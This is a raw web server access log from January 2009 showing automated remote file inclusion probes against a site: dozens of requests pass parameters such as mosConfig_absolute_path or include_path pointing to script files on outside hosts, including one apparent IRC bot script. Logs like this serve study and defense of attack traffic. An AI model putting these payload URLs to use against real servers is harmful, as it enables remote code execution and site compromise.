203.162.139.20 - - [30/Jan/2009:11:51:13 -0800] "GET /logs//components/com_sef/sef_incl.php?mosConfig_absolute_path=http://www.welcometoreason.com/idrose.txt??%0D? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.dmulk.com"
201.232.54.48 - - [30/Jan/2009:11:51:41 -0800] "GET /logs/access_081101.log//guestbook1//admin.php?include_path=http://www.asthmant.org.au/pdf/.dat/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
194.30.160.11 - - [30/Jan/2009:11:51:50 -0800] "GET /logs/access_080806.log//index.php?content=http://www.kimstroy.by//assets/images/roxx.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
203.162.139.20 - - [30/Jan/2009:11:52:01 -0800] "GET /logs/access_080827.log//components/com_sef/sef_incl.php?mosConfig_absolute_path=http://www.welcometoreason.com/idrose.txt??%0D? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.dmulk.com"
203.162.139.20 - - [30/Jan/2009:11:52:28 -0800] "GET /logs/access_080827.log//components/com_sef/sef_incl.php?mosConfig_absolute_path=http://www.welcometoreason.com/idrose.txt??%0D? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.dmulk.com"
201.232.54.48 - - [30/Jan/2009:11:52:33 -0800] "GET /logs/access_081019.log//guestbook1//admin.php?include_path=http://www.asthmant.org.au/pdf/.dat/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
79.98.134.38 - - [30/Jan/2009:11:52:46 -0800] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://ragas.baarleweb.net/data/sobi/scan/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.823" "www.dmulk.com"
79.98.134.38 - - [30/Jan/2009:11:52:46 -0800] "GET /logs/access_081007.log//include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://ragas.baarleweb.net/data/sobi/scan/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.823" "www.dmulk.com"
79.98.134.38 - - [30/Jan/2009:11:52:46 -0800] "GET /logs//include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://ragas.baarleweb.net/data/sobi/scan/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.823" "www.dmulk.com"
119.245.138.143 - - [30/Jan/2009:11:54:04 -0800] "GET /logs/!rfihttp://www.aerothaiunion.com/sik.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
119.245.138.143 - - [30/Jan/2009:11:54:04 -0800] "GET /!rfihttp://www.aerothaiunion.com/sik.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
119.245.138.143 - - [30/Jan/2009:11:54:06 -0800] "GET /logs/access_080219.log/!rfihttp://www.aerothaiunion.com/sik.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
119.245.138.143 - - [30/Jan/2009:11:54:07 -0800] "GET /!rfihttp://www.aerothaiunion.com/sik.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
119.245.138.143 - - [30/Jan/2009:11:54:07 -0800] "GET /logs/!rfihttp://www.aerothaiunion.com/sik.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
119.245.138.143 - - [30/Jan/2009:11:54:10 -0800] "GET /logs/access_080602.log/!rfihttp://www.aerothaiunion.com/sik.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
119.245.138.143 - - [30/Jan/2009:11:54:10 -0800] "GET /!rfihttp://www.aerothaiunion.com/sik.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
119.245.138.143 - - [30/Jan/2009:11:54:10 -0800] "GET /logs/!rfihttp://www.aerothaiunion.com/sik.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.108.67.99 - - [30/Jan/2009:11:55:02 -0800] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://oursoultvxq.com/bbs/data/vip/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
89.108.67.99 - - [30/Jan/2009:11:55:03 -0800] "GET /phpsecurityadmin/include/logout.php?PSA_PATH=http://oursoultvxq.com/bbs/data/vip/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
91.195.124.11 - - [30/Jan/2009:11:55:06 -0800] "GET /logs/phphtml.php?htmlclass_path=http://oursoultvxq.com/bbs/data/vip/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.195.124.11 - - [30/Jan/2009:11:55:07 -0800] "GET /phphtml.php?htmlclass_path=http://oursoultvxq.com/bbs/data/vip/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.207.106.54 - - [30/Jan/2009:11:55:30 -0800] "GET /logs//Neos_Chronos/header.php?base_folder=http://crosszero.org/zero/iddd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
193.207.106.54 - - [30/Jan/2009:11:55:30 -0800] "GET /Neos_Chronos/header.php?base_folder=http://crosszero.org/zero/iddd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
193.207.106.54 - - [30/Jan/2009:11:58:31 -0800] "GET /logs/access_080107.log//Neos_Chronos/header.php?base_folder=http://crosszero.org/zero/iddd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.193.210.232 - - [30/Jan/2009:11:58:50 -0800] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://oursoultvxq.com/bbs/data/vip/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
216.193.210.232 - - [30/Jan/2009:11:58:51 -0800] "GET /phpsecurityadmin/include/logout.php?PSA_PATH=http://oursoultvxq.com/bbs/data/vip/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
216.97.227.55 - - [30/Jan/2009:11:59:11 -0800] "GET /logs/access_080906.log//include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.geocities.com/mariobrosp3/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
216.97.227.55 - - [30/Jan/2009:11:59:11 -0800] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.geocities.com/mariobrosp3/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
216.97.227.55 - - [30/Jan/2009:11:59:11 -0800] "GET /logs/access_080906.log//include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.geocities.com/mariobrosp3/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
216.97.227.55 - - [30/Jan/2009:11:59:11 -0800] "GET /logs//include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.geocities.com/mariobrosp3/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
216.97.227.55 - - [30/Jan/2009:11:59:11 -0800] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.geocities.com/mariobrosp3/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
216.97.227.55 - - [30/Jan/2009:11:59:11 -0800] "GET /logs//include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.geocities.com/mariobrosp3/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
216.97.227.55 - - [30/Jan/2009:11:59:11 -0800] "GET /logs/access_080906.log//include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.geocities.com/mariobrosp3/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
216.97.227.55 - - [30/Jan/2009:11:59:11 -0800] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.geocities.com/mariobrosp3/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
216.97.227.55 - - [30/Jan/2009:11:59:11 -0800] "GET /logs//include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.geocities.com/mariobrosp3/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
203.142.16.45 - - [30/Jan/2009:11:59:44 -0800] "GET /logs/access_080407.log//index.php?_SERVER[DOCUMENT_ROOT]=http://www.aerothaiunion.com/sik.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
203.142.16.45 - - [30/Jan/2009:11:59:49 -0800] "GET /index.php?_SERVER[DOCUMENT_ROOT]=http://www.aerothaiunion.com/sik.txt? HTTP/1.1" 200 65555 "-" "libwww-perl/5.79" "www.dmulk.com"
203.142.16.45 - - [30/Jan/2009:11:59:49 -0800] "GET /logs//index.php?_SERVER[DOCUMENT_ROOT]=http://www.aerothaiunion.com/sik.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
203.142.16.45 - - [30/Jan/2009:12:00:11 -0800] "GET /logs/access_080914.log//index.php?_SERVER[DOCUMENT_ROOT]=http://www.aerothaiunion.com/sik.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
77.221.130.3 - - [30/Jan/2009:12:01:39 -0800] "GET /logs/access_080531.log//skin/zero_vote/ask_password.php?dir=http://madrigaldelavera.es/joomla/mambots/editors/idit.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
77.221.130.3 - - [30/Jan/2009:12:01:39 -0800] "GET /skin/zero_vote/ask_password.php?dir=http://madrigaldelavera.es/joomla/mambots/editors/idit.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
89.108.67.99 - - [30/Jan/2009:12:02:06 -0800] "GET /logs/phphtml.php?htmlclass_path=http://oursoultvxq.com/bbs/data/vip/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
91.197.128.62 - - [30/Jan/2009:12:02:07 -0800] "GET /logs/scripts.log/index.php?error=http://www.aerothaiunion.com/sik.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
91.197.128.62 - - [30/Jan/2009:12:02:08 -0800] "GET /index.php?error=http://www.aerothaiunion.com/sik.txt? HTTP/1.1" 200 94675 "-" "libwww-perl/5.803" "www.dmulk.com"
91.197.128.62 - - [30/Jan/2009:12:02:10 -0800] "GET /logs/index.php?error=http://www.aerothaiunion.com/sik.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.108.67.99 - - [30/Jan/2009:12:02:10 -0800] "GET /phphtml.php?htmlclass_path=http://oursoultvxq.com/bbs/data/vip/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
77.221.130.15 - - [30/Jan/2009:12:02:10 -0800] "GET /logs/access_080201.log//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://cccgj.org/media/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.dmulk.com"
77.221.130.15 - - [30/Jan/2009:12:02:37 -0800] "GET /logs/access_080303.log//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://cccgj.org/media/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.dmulk.com"
77.221.130.3 - - [30/Jan/2009:12:03:09 -0800] "GET /logs/access_080606.log//skin/zero_vote/ask_password.php?dir=http://madrigaldelavera.es/joomla/mambots/editors/idit.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
77.221.130.3 - - [30/Jan/2009:12:04:59 -0800] "GET /logs/access_080531.log//skin/zero_vote/ask_password.php?dir=http://madrigaldelavera.es/joomla/mambots/editors/idit.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.221.130.3 - - [30/Jan/2009:12:05:00 -0800] "GET /skin/zero_vote/ask_password.php?dir=http://madrigaldelavera.es/joomla/mambots/editors/idit.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.221.130.3 - - [30/Jan/2009:12:05:00 -0800] "GET /logs//skin/zero_vote/ask_password.php?dir=http://madrigaldelavera.es/joomla/mambots/editors/idit.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.34.174.137 - - [30/Jan/2009:12:05:10 -0800] "GET /logs/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.keken.web.id/psybnc/bot.pl?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.dmulk.com"
64.34.174.137 - - [30/Jan/2009:12:05:10 -0800] "GET /index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.keken.web.id/psybnc/bot.pl?? HTTP/1.1" 200 50 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.dmulk.com"
85.204.231.202 - - [30/Jan/2009:12:06:36 -0800] "GET /logs///index2.php?DoAction=http://www.imsrn.fr/images/stories/rocher/thumbnails/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.204.231.202 - - [30/Jan/2009:12:06:39 -0800] "GET //index2.php?DoAction=http://www.imsrn.fr/images/stories/rocher/thumbnails/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
206.251.130.100 - - [30/Jan/2009:12:07:18 -0800] "GET /shop.php?shopid= HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
206.251.130.100 - - [30/Jan/2009:12:07:18 -0800] "GET /logs/access_071230.log/shop.php?shopid= HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
206.251.130.100 - - [30/Jan/2009:12:07:18 -0800] "GET /logs/shop.php?shopid= HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.97.227.55 - - [30/Jan/2009:12:07:28 -0800] "GET /logs/access_081024.log//include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.geocities.com/mariobrosp3/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
216.97.227.55 - - [30/Jan/2009:12:07:28 -0800] "GET /logs/access_081024.log//include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.geocities.com/mariobrosp3/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
216.97.227.55 - - [30/Jan/2009:12:07:28 -0800] "GET /logs/access_081024.log//include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.geocities.com/mariobrosp3/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
66.225.237.123 - - [30/Jan/2009:12:08:13 -0800] "GET /logs/access_080712.log/?sIncPath=http://gumansin.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
66.225.237.123 - - [30/Jan/2009:12:08:13 -0800] "GET /logs/?sIncPath=http://gumansin.com/id.txt?? HTTP/1.1" 200 84604 "-" "Mozilla/5.0" "www.dmulk.com"
66.225.237.123 - - [30/Jan/2009:12:08:14 -0800] "GET /logs/access_080712.log/?sIncPath=http://gumansin.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
66.225.237.123 - - [30/Jan/2009:12:08:14 -0800] "GET /?sIncPath=http://gumansin.com/id.txt?? HTTP/1.1" 200 94609 "-" "Mozilla/5.0" "www.dmulk.com"
66.225.237.123 - - [30/Jan/2009:12:08:14 -0800] "GET /logs/?sIncPath=http://gumansin.com/id.txt?? HTTP/1.1" 200 84604 "-" "Mozilla/5.0" "www.dmulk.com"
66.225.237.123 - - [30/Jan/2009:12:08:14 -0800] "GET /?sIncPath=http://gumansin.com/id.txt?? HTTP/1.1" 200 94609 "-" "Mozilla/5.0" "www.dmulk.com"
77.221.130.3 - - [30/Jan/2009:12:08:50 -0800] "GET /skin/zero_vote/ask_password.php?dir=http://madrigaldelavera.es/joomla/mambots/editors/idit.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.221.130.3 - - [30/Jan/2009:12:09:04 -0800] "GET /logs/access_080606.log//skin/zero_vote/ask_password.php?dir=http://madrigaldelavera.es/joomla/mambots/editors/idit.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.204.231.202 - - [30/Jan/2009:12:10:06 -0800] "GET /logs/access_080909.log///index2.php?content=http://www.imsrn.fr/images/stories/rocher/thumbnails/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.204.231.202 - - [30/Jan/2009:12:10:10 -0800] "GET //index2.php?content=http://www.imsrn.fr/images/stories/rocher/thumbnails/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.204.231.202 - - [30/Jan/2009:12:10:13 -0800] "GET /logs///index2.php?content=http://www.imsrn.fr/images/stories/rocher/thumbnails/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
203.142.16.45 - - [30/Jan/2009:12:10:49 -0800] "GET /logs/access_080928.log/?base_dir=http://www.aerothaiunion.com/sik.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
203.142.16.45 - - [30/Jan/2009:12:10:51 -0800] "GET /?base_dir=http://www.aerothaiunion.com/sik.txt? HTTP/1.1" 200 94642 "-" "libwww-perl/5.79" "www.dmulk.com"
203.142.16.45 - - [30/Jan/2009:12:10:52 -0800] "GET /logs/?base_dir=http://www.aerothaiunion.com/sik.txt? HTTP/1.1" 200 84604 "-" "libwww-perl/5.79" "www.dmulk.com"
59.16.91.22 - - [30/Jan/2009:12:12:00 -0800] "GET /logs/access_080712.log/?sIncPath=http://gumansin.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
59.16.91.22 - - [30/Jan/2009:12:12:00 -0800] "GET /logs/?sIncPath=http://gumansin.com/id.txt?? HTTP/1.1" 200 84604 "-" "Mozilla/5.0" "www.dmulk.com"
59.16.91.22 - - [30/Jan/2009:12:12:01 -0800] "GET /?sIncPath=http://gumansin.com/id.txt?? HTTP/1.1" 200 94609 "-" "Mozilla/5.0" "www.dmulk.com"
85.204.231.202 - - [30/Jan/2009:12:12:08 -0800] "GET //index2.php?DoAction=http://www.imsrn.fr/images/stories/rocher/thumbnails/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
64.40.144.151 - - [30/Jan/2009:12:13:07 -0800] "GET /logs/access_081116.log/plugins/payment/secpay/secpay.inc.php?config%5Broot_dir%5D=http://armadaglass.webrok.co.uk/p6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
64.40.144.151 - - [30/Jan/2009:12:13:07 -0800] "GET /plugins/payment/secpay/secpay.inc.php?config%5Broot_dir%5D=http://armadaglass.webrok.co.uk/p6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
64.40.144.151 - - [30/Jan/2009:12:13:07 -0800] "GET /logs/plugins/payment/secpay/secpay.inc.php?config%5Broot_dir%5D=http://armadaglass.webrok.co.uk/p6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
213.186.61.66 - - [30/Jan/2009:12:13:19 -0800] "GET /excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.kimstroy.by//assets/images/roxx.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.204.231.202 - - [30/Jan/2009:12:13:30 -0800] "GET /logs/access_080905.log///index2.php?DoAction=http://www.imsrn.fr/images/stories/rocher/thumbnails/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.204.231.202 - - [30/Jan/2009:12:13:34 -0800] "GET //index2.php?DoAction=http://www.imsrn.fr/images/stories/rocher/thumbnails/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.204.231.202 - - [30/Jan/2009:12:13:37 -0800] "GET /logs///index2.php?DoAction=http://www.imsrn.fr/images/stories/rocher/thumbnails/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
64.40.144.151 - - [30/Jan/2009:12:13:37 -0800] "GET /logs/access_080722.log/plugins/payment/secpay/secpay.inc.php?config%5Broot_dir%5D=http://armadaglass.webrok.co.uk/p6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.249.73.228 - - [30/Jan/2009:12:14:11 -0800] "GET /blog/wp-content/gallery/techstoc-2008/img_1009.jpg HTTP/1.1" 200 0 "-" "Googlebot-Image/1.0" "dmulk.com"
59.16.91.22 - - [30/Jan/2009:12:14:30 -0800] "GET /logs/access_080831.log/?sIncPath=http://gumansin.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
87.106.21.190 - - [30/Jan/2009:12:14:50 -0800] "GET /logs/access_080128.log/?mosConfig_absolute_path=http://www.kimstroy.by//assets/images/roxx.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.21.190 - - [30/Jan/2009:12:14:52 -0800] "GET /?mosConfig_absolute_path=http://www.kimstroy.by//assets/images/roxx.jpg??? HTTP/1.1" 200 94917 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.21.190 - - [30/Jan/2009:12:14:53 -0800] "GET /logs/?mosConfig_absolute_path=http://www.kimstroy.by//assets/images/roxx.jpg??? HTTP/1.1" 200 84604 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.21.190 - - [30/Jan/2009:12:14:55 -0800] "GET /logs/access_080718.log/?mosConfig_absolute_path=http://www.kimstroy.by//assets/images/roxx.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.204.231.202 - - [30/Jan/2009:12:15:00 -0800] "GET /logs/access_080604.log///index2.php?DoAction=http://www.imsrn.fr/images/stories/rocher/thumbnails/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
72.30.65.25 - - [30/Jan/2009:12:15:06 -0800] "GET /logs/access_070816.log HTTP/1.0" 200 48263 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
77.221.130.15 - - [30/Jan/2009:12:15:16 -0800] "GET /logs/access_080529.log/errors.php?error=http://cccgj.org/media/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.dmulk.com"
77.221.130.15 - - [30/Jan/2009:12:15:17 -0800] "GET /logs/errors.php?error=http://cccgj.org/media/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.dmulk.com"
77.221.130.15 - - [30/Jan/2009:12:15:17 -0800] "GET /errors.php?error=http://cccgj.org/media/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.dmulk.com"
77.221.130.15 - - [30/Jan/2009:12:15:24 -0800] "GET /logs/access_080216.log/errors.php?error=http://cccgj.org/media/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.dmulk.com"
67.205.102.239 - - [30/Jan/2009:12:16:15 -0800] "GET /logs/access_080411.log//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.agarwalcards.com/vnc/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.205.102.239 - - [30/Jan/2009:12:16:15 -0800] "GET /modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.agarwalcards.com/vnc/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.205.102.239 - - [30/Jan/2009:12:16:15 -0800] "GET /logs//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.agarwalcards.com/vnc/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.205.102.239 - - [30/Jan/2009:12:16:26 -0800] "GET /logs/access_080406.log//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.agarwalcards.com/vnc/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
87.106.21.190 - - [30/Jan/2009:12:16:32 -0800] "GET /?mosConfig_absolute_path=http://www.kimstroy.by//assets/images/roxx.jpg??? HTTP/1.1" 200 94917 "-" "libwww-perl/5.805" "www.dmulk.com"
85.204.231.202 - - [30/Jan/2009:12:16:37 -0800] "GET /logs/access_080928.log///index2.php?content=http://www.imsrn.fr/images/stories/rocher/thumbnails/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
72.30.65.25 - - [30/Jan/2009:12:16:48 -0800] "GET /logs/access_080530.log HTTP/1.0" 200 2609231 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
207.162.219.29 - - [30/Jan/2009:12:17:16 -0800] "GET /logs/access_071230.log/components/errors.php?error=http://www.radioficko.com/chat/chat/uploaddir/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.162.219.29 - - [30/Jan/2009:12:17:17 -0800] "GET /components/errors.php?error=http://www.radioficko.com/chat/chat/uploaddir/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.162.219.29 - - [30/Jan/2009:12:17:17 -0800] "GET /logs/components/errors.php?error=http://www.radioficko.com/chat/chat/uploaddir/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.221.240.132 - - [30/Jan/2009:12:17:17 -0800] "GET /logs/access_080821.log//doceboCms/class/class.dashboard_cms.php?where_framework=http://madrigaldelavera.es/joomla/mambots/editors/tukulid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.dmulk.com"
89.221.240.132 - - [30/Jan/2009:12:17:17 -0800] "GET /doceboCms/class/class.dashboard_cms.php?where_framework=http://madrigaldelavera.es/joomla/mambots/editors/tukulid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.dmulk.com"
89.221.240.132 - - [30/Jan/2009:12:17:17 -0800] "GET /logs//doceboCms/class/class.dashboard_cms.php?where_framework=http://madrigaldelavera.es/joomla/mambots/editors/tukulid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.dmulk.com"
89.221.240.132 - - [30/Jan/2009:12:17:20 -0800] "GET /logs/access_080503.log//doceboCms/class/class.dashboard_cms.php?where_framework=http://madrigaldelavera.es/joomla/mambots/editors/tukulid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.dmulk.com"
207.162.219.29 - - [30/Jan/2009:12:17:22 -0800] "GET /logs/access_081222.log/components/errors.php?error=http://www.radioficko.com/chat/chat/uploaddir/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
63.247.129.200 - - [30/Jan/2009:12:17:48 -0800] "GET /logs/access_080605.log//class/class.admin_menu_lms.php?where_framework=http://www.cybernewspr.com/cache/idomila.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
63.247.129.200 - - [30/Jan/2009:12:17:49 -0800] "GET /class/class.admin_menu_lms.php?where_framework=http://www.cybernewspr.com/cache/idomila.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
